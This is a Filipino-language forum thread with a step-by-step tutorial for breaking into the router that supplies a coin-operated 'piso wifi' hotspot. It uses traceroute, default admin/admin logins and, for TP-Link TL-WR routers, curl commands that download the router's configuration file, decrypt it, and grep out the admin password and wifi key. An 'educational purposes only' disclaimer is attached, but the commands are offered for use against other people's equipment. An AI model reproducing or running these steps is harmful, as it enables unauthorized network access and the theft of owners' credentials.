What's new

Tutorial How to häçk wifi na naka connect sa piso wifi (No firewall enabled only).

NzD4rkS3c

Grasshopper
Joined
Apr 27, 2024
Posts
9
Reaction
29
Points
9
In this thread ituturo ko sainyo kung paano ihäçk ung wifi na nagproprovide ng internet sa piso wifi.
so una..

1.
install termux app: You do not have permission to view the full content of this post. Log in or register now.
o kung may laptap ka install WSL tas ubuntu or kali linux.

2.
install tools:

apt install nmap traceroute curl -y

3. check if may firewall ba:

traceroute -m 5 google.com

pag walang firewall parang ganto lalabas:
traceroute to google.com (172.217.26.78), 5 hops max, 60 byte packets
1 10.0.0.1 (10.0.0.1) 1.520 ms 1.864 ms 1.534 ms
2 192.168.0.1 (192.168.0.1) 1.435 ms 1.590 ms 1.229 ms
3 192.168.50.1 (192.168.50.1) 63.771 ms 65.695 ms 62.686 ms
4 EXAMPLE.180 (EXAMPLE) 63.286 ms 62.938 ms 60.872 ms
5 EXAMPLE.static.pldt.net (EXAMPLE) 112.608 ms 91.815 ms 111.253 ms
NOTE: Magkakaiba tayo ng IPs so.. don't expect na ganyan din yung lalabas sainyo..

tas pag merong firewall:
traceroute to google.com (172.217.26.78), 5 hops max, 60 byte packets
1 10.0.0.1 (10.0.0.1) 1.520 ms 1.864 ms 1.534 ms
2 *
3 *
4 *
5 *

RED -> IP ng router/wifi or IP ng tower na naglilink ng connections.
GREEN -> PUBLIC IP (fiber tower)
BLUE -> INTERNET PROVIDER

4. Ilagay sa browser yung nakared na IP tas itry ilogin yung admin/admin na username at password..

5. Hanapin ang password ng wifi. at kommonek.




BONUS:

if TP-LINK ung router Model: TL-WRxxxx

1.
check if tplink:

curl http://IP_NG_ROUTER | grep "TL-WR"
pag may lumabas na modelName="TL-WRxxxxx" then TPlink.


2. Pull off yung configuration file ng router:

curl http://IP_NG_ROUTER/cgi/conf.bin -H 'Referer: http://IP_NG_ROUTER' -o config.bin

3. Decrypt ung config file ng router
apt install python -y; pip3 install pycryptodome
wget You do not have permission to view the full content of this post. Log in or register now.
python3 decrypt.py config.bin conf.xml

4. Extract ung admin panel password
# admin panel password:
cat conf.xml | grep -e AdminName -e AdminPwd

# Wireless wifi password:
cat conf.xml | grep "hared val="
and done. you can now connect.

HAPPY häçkING!


DISCLAIMER: I AM (NZD4RKS3C) IS NOT RESPONSIBLE FOR ANY îllégâl ACTIVITIES THAT YOU MIGHT COMMIT AFTER READING THIS SHIT. WELL THIS IS FOR EDUCATIONAL PURPOSES ONLY AND JUST TO MAKE YOU AWARE OF THE POSSIBLE WAYS OF GETTING häçkED.
 
Last edited:
Bat ganito po



Screenshot_20240501-014248.jpg
 

Attachments

Similar threads

Users search this thread by keywords

  1. Piso wifi
  2. Piso wifi häçk
  3. wifi häçk
  4. pisowifi häçk
  5. pldt wifi häçk
  6. piso wifi bypass
  7. Bypass piso wifi
  8. Pldt häçk
  9. Piso wifi termux
  10. häçk wifi
  11. pldt fiber häçk
  12. app for wifi häçking
  13. wifi password häçk
  14. linux wifi
  15. Piso wifi password
  16. Bypass wifi
  17. How to connect wifi
  18. Wifi password
  19. Pldt wifi password
  20. häçk pisowifi
  21. Pldt wifi
  22. Termux piso wifi
  23. Termux for wifi
  24. Admin
  25. häçk piso wifi
  26. Piso wifi config
  27. pldt piso wifi
  28. Termux wifi
  29. Wifi bypass
  30. piso wifi pldt admin
  31. how to häçk wifi
  32. wifi häçk in termux
  33. häçking wifi
  34. wifi häçk password
  35. public wifi
  36. häçk wifi password
  37. wifi häçk app
  38. wifi häçk password app
  39. piso wifi häçks
  40. red fiber häçk
  41. piso wifi admin
  42. Tp link piso wifi
  43. Bypass firewall
  44. pldt häçk app
  45. root needed
  46. no wifi internet
  47. kali linux wifi häçk
  48. Pisowifi admin
  49. How to häçk PLDT wifi
  50. Piso wifi how to häçk
  51. kali linux wifi häçking
  52. wifi häçk tool
  53. wifi apps
  54. ssh password piso wifi
  55. PLDT config
  56. häçked wifi password
  57. Green packet
  58. Bypass pldt wifi connection
Back
Top